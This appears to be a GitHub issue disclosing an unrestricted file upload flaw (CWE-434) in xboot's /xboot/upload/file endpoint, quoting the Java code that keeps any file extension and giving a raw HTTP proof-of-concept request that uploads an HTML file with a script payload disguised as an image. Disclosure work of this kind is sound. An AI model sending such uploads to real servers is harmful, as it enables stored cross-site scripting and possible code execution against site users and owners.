xboot icon indicating copy to clipboard operation
xboot copied to clipboard
verified publisher icon Exrick

Unrestricted Upload of File with Dangerous Type (CWE-434) /xboot/upload/file

Open NinjaGPT opened this issue 5 months ago • 0 comments

Summary

The endpoint "/xboot/upload/file" allows attackers to upload malicious files with arbitrary extensions, potentially creating attack vectors for stored Cross-Site Scripting (XSS), even Remote Code Execution (RCE) attacks.

Details

  • xboot-fast/src/main/java/cn/exrick/xboot/modules/base/controller/common/UploadController.java
@Slf4j
@RestController
@Api(tags = "文件上传接口")
@RequestMapping("/xboot/upload")
@Transactional
public class UploadController {

    @Value("${xboot.maxUploadFile}")
    private Integer maxUploadFile;

    @Autowired
    private QiniuUtil qiniuUtil;

    @RequestMapping(value = "/file", method = RequestMethod.POST)
    @ApiOperation(value = "文件上传")
    public Result<Object> upload(@RequestParam(required = false) MultipartFile file,
                                 @RequestParam(required = false) String base64) {

        if (file.getSize() > maxUploadFile * 1024 * 1024) {
            return ResultUtil.error("文件大小过大,不能超过" + maxUploadFile + "MB");
        }
        if (StrUtil.isNotBlank(base64)) {
            // base64上传
            file = Base64DecodeMultipartFile.base64Convert(base64);
        }
        String result;
        String fileName = CommonUtil.renamePic(file.getOriginalFilename());
        try {
            InputStream inputStream = file.getInputStream();
            // 上传七牛云服务器
            result = qiniuUtil.qiniuInputStreamUpload(inputStream, fileName);
        } catch (Exception e) {
            log.error(e.toString());
            return ResultUtil.error(e.toString());
        }

        return ResultUtil.data(result);
    }
}
  • xboot-fast/src/main/java/cn/exrick/xboot/common/utils/CommonUtil.java
public static String renamePic(String fileName) {

    String extName = "";
    if (fileName.contains(".")) {
        extName = fileName.substring(fileName.lastIndexOf("."));
    }
    return IdUtil.simpleUUID() + extName;
}

POC




POST /xboot/upload/file HTTP/1.1
Host: localhost:9999
Content-Length: 231
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
accessToken: 65aa38a0b6034066bd7a080520dde446
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykm1yoRzGFrNZRql9
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:9999
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:9999/open/client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=GA1.1.1119679874.1749601651; CHAT2DB.USER_ID=2; _ga_V8M4E5SF61=GS2.1.s1749601650$o1$g1$t1749601661$j49$l0$h0; PUBLICCMS_ADMIN=1_98929ca2-feeb-4745-8c8b-83ce96a02974; PUBLICCMS_ANALYTICS_ID=3c11ec88-14ff-4a2d-945e-a76277395bfe; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1752119531,1752119879,1752126651,1752126882; cms.locale=zh; Hm_lvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753156816; HMACCOUNT=71B59AD17A941F07; userInfo={%22id%22:%22682265633886208%22%2C%22createBy%22:%22%22%2C%22createTime%22:%222018-05-01%2003:13:51%22%2C%22updateBy%22:%22admin%22%2C%22updateTime%22:%222020-04-30%2004:56:32%22%2C%22delFlag%22:0%2C%22username%22:%22admin%22%2C%22password%22:null%2C%22nickname%22:%22%E7%AE%A1%E7%90%86%E5%91%98%22%2C%22mobile%22:%2218782059031%22%2C%22email%22:%[email protected]%22%2C%22address%22:%22%E5%8C%97%E4%BA%AC%E5%B8%82%2C%E5%B8%82%E8%BE%96%E5%8C%BA%2C%E4%B8%9C%E5%9F%8E%E5%8C%BA%22%2C%22street%22:%22%E5%A4%A9%E5%BA%9C1%E8%A1%97%22%2C%22sex%22:%22%E7%94%B7%22%2C%22passStrength%22:%22%E5%BC%B1%22%2C%22avatar%22:%22https://ooo.0o0.ooo/2019/04/28/5cc5a71a6e3b6.png%22%2C%22type%22:1%2C%22status%22:0%2C%22description%22:%22%E6%88%91%E6%98%AF%E5%A4%A7%E5%B8%85%E9%80%BC%22%2C%22departmentId%22:%2240322777781112832%22%2C%22departmentTitle%22:%22%E6%80%BB%E9%83%A8%22%2C%22birth%22:%222020-04-15%22%2C%22defaultRole%22:null}; videoShowed=videoShowed; Hm_lpvt_64e52d9ed8f5acc3eb7d60058e2fb7ab=1753163004
Connection: close

------WebKitFormBoundarykm1yoRzGFrNZRql9
Content-Disposition: form-data; name="file"; filename="xss.html"
Content-Type: image/jpeg

<script>alert("POC confirmed by ZAST");</script>

------WebKitFormBoundarykm1yoRzGFrNZRql9--

Impact

The Stored XSS vulnerability allows attackers launch attacks via arbitrary javascript code execution, such as phishing, stealing user's credentials, etc

  • Reference: https://portswigger.net/web-security/cross-site-scripting/stored

NinjaGPT avatar Jul 22 '25 12:07 NinjaGPT